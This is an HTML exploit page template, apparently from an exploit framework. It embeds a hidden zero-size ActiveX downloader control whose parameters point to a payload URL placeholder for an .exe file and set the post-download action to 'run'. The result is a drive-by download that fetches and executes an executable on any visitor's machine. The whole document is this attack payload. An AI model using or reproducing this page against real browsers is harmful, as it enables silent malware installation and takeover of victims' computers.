<html>
      <object id="DownloaderActiveX1" width="0" height="0" classid="CLSID:c1b7e532-3ecb-4e9e-bb3a-2951ffe67c61" codebase="DownloaderActiveX.cab#Version=1,0,0,1">
        <param name="propProgressBackground"  value="#bccee8">
        <param name="propTextBackground"  value="#f7f8fc">
        <param name="propBarColor"  value="#df0203">
        <param name="propTextColor"  value="#000000">
        <param name="propWidth"  value="0">
        <param name="propHeight"  value="0">
        <param name="propDownloadUrl"  value="#{payload_url}/#{exe}.exe">
        <param name="propPostDownloadAction"  value="run">
        <param name="propInstallCompleteUrl"  value="">
        <param name="propBrowserRedirectUrl"  value="">
        <param name="propVerbose"  value="0">
        <param name="propInterrupt"  value="0">
      </OBJECT>
    </html>